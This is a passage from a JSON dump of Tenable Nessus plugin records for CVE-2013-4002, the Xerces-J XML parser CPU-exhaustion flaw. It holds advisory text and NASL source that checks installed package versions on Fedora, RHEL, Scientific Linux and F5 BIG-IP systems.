eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"xerces-j2-2.11.0-22.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xerces-j2\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T08:53:47", "bulletinFamily": "scanner", "description": "Updated xerces-j2 packages that fix one security issue are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nApache Xerces for Java (Xerces-J) is a high performance, standards\ncompliant, validating XML parser written in Java. The xerces-j2\npackages provide Xerces-J version 2.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU. 
(CVE-2013-4002)\n\nAll xerces-j2 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. Applications\nusing the Xerces-J must be restarted for this update to take effect.", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2014-1319.NASL", "href": "https://www.tenable.com/plugins/nessus/77979", "published": "2014-09-30T00:00:00", "title": "RHEL 6 / 7 : xerces-j2 (RHSA-2014:1319)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1319. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77979);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/10/24 15:35:38\");\n\n script_cve_id(\"CVE-2013-4002\");\n script_xref(name:\"RHSA\", value:\"2014:1319\");\n\n script_name(english:\"RHEL 6 / 7 : xerces-j2 (RHSA-2014:1319)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated xerces-j2 packages that fix one security issue are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nApache Xerces for Java (Xerces-J) is a high performance, standards\ncompliant, validating XML parser written in Java. The xerces-j2\npackages provide Xerces-J version 2.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. 
A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU. (CVE-2013-4002)\n\nAll xerces-j2 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. Applications\nusing the Xerces-J must be restarted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:1319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-4002\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-javadoc-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-javadoc-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-javadoc-other\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-javadoc-xni\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1319\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xerces-j2-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xerces-j2-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", 
reference:\"xerces-j2-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xerces-j2-debuginfo-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xerces-j2-debuginfo-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xerces-j2-debuginfo-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xerces-j2-demo-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xerces-j2-demo-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xerces-j2-demo-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xerces-j2-javadoc-apis-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xerces-j2-javadoc-apis-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xerces-j2-javadoc-apis-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xerces-j2-javadoc-impl-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xerces-j2-javadoc-impl-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xerces-j2-javadoc-impl-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xerces-j2-javadoc-other-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xerces-j2-javadoc-other-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xerces-j2-javadoc-other-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xerces-j2-javadoc-xni-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xerces-j2-javadoc-xni-2.7.1-12.7.el6_5\")) flag++;\n\n if 
(rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xerces-j2-javadoc-xni-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xerces-j2-scripts-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xerces-j2-scripts-2.7.1-12.7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xerces-j2-scripts-2.7.1-12.7.el6_5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", reference:\"xerces-j2-2.11.0-17.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"xerces-j2-demo-2.11.0-17.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"xerces-j2-javadoc-2.11.0-17.el7_0\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xerces-j2 / xerces-j2-debuginfo / xerces-j2-demo / etc\");\n }\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T09:13:22", "bulletinFamily": "scanner", "description": "A resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU. 
(CVE-2013-4002)\n\nApplications using the Xerces-J must be restarted for this update to\ntake effect.", "modified": "2019-12-02T00:00:00", "id": "SL_20140929_XERCES_J2_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/77981", "published": "2014-09-30T00:00:00", "title": "Scientific Linux Security Update : xerces-j2 on SL6.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77981);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/12/28 10:10:35\");\n\n script_cve_id(\"CVE-2013-4002\");\n\n script_name(english:\"Scientific Linux Security Update : xerces-j2 on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU. 
(CVE-2013-4002)\n\nApplications using the Xerces-J must be restarted for this update to\ntake effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1409&L=scientific-linux-errata&T=0&P=2369\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ca3c8199\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"xerces-j2-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", 
reference:\"xerces-j2-debuginfo-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xerces-j2-demo-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xerces-j2-javadoc-apis-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xerces-j2-javadoc-impl-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xerces-j2-javadoc-other-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xerces-j2-javadoc-xni-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xerces-j2-scripts-2.7.1-12.7.el6_5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T07:03:51", "bulletinFamily": "scanner", "description": "Security fix for CVE-2013-4002\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2014-10626.NASL", "href": "https://www.tenable.com/plugins/nessus/77867", "published": "2014-09-26T00:00:00", "title": "Fedora 20 : xerces-j2-2.11.0-17.fc20 (2014-10626)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-10626.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77867);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:06:07 $\");\n\n script_cve_id(\"CVE-2013-4002\");\n script_bugtraq_id(61310);\n script_xref(name:\"FEDORA\", value:\"2014-10626\");\n\n script_name(english:\"Fedora 20 : xerces-j2-2.11.0-17.fc20 (2014-10626)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2013-4002\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1019176\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138667.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?873a7760\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xerces-j2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = 
eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"xerces-j2-2.11.0-17.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xerces-j2\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T07:02:23", "bulletinFamily": "scanner", "description": "Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM\nJava 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6,\nand 7 before 7 SR5 allows remote attackers to affect availability via\nunknown vectors.", "modified": "2019-12-02T00:00:00", "id": "F5_BIGIP_SOL16872.NASL", "href": "https://www.tenable.com/plugins/nessus/85918", "published": "2015-09-14T00:00:00", "title": "F5 Networks BIG-IP : Java Runtime Environment vulnerability (SOL16872)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL16872.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85918);\n script_version(\"2.6\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2013-4002\");\n 
script_bugtraq_id(61310);\n\n script_name(english:\"F5 Networks BIG-IP : Java Runtime Environment vulnerability (SOL16872)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM\nJava 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6,\nand 7 before 7 SR5 allows remote attackers to affect availability via\nunknown vectors.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K16872\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL16872.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! 
get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL16872\";\nvmatrix = make_array();\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.3.0-11.6.1\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.1HF1\",\"11.5.4HF2\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.4.0-11.6.1\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.1HF1\",\"11.5.4HF2\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.1HF1\",\"11.5.4HF2\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\",\"10.0.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.1HF1\",\"11.5.4HF2\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.1HF1\",\"11.5.4HF2\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\",\"10.0.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.1HF1\",\"11.5.4HF2\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\",\"10.0.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.1HF1\",\"11.5.4HF2\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = 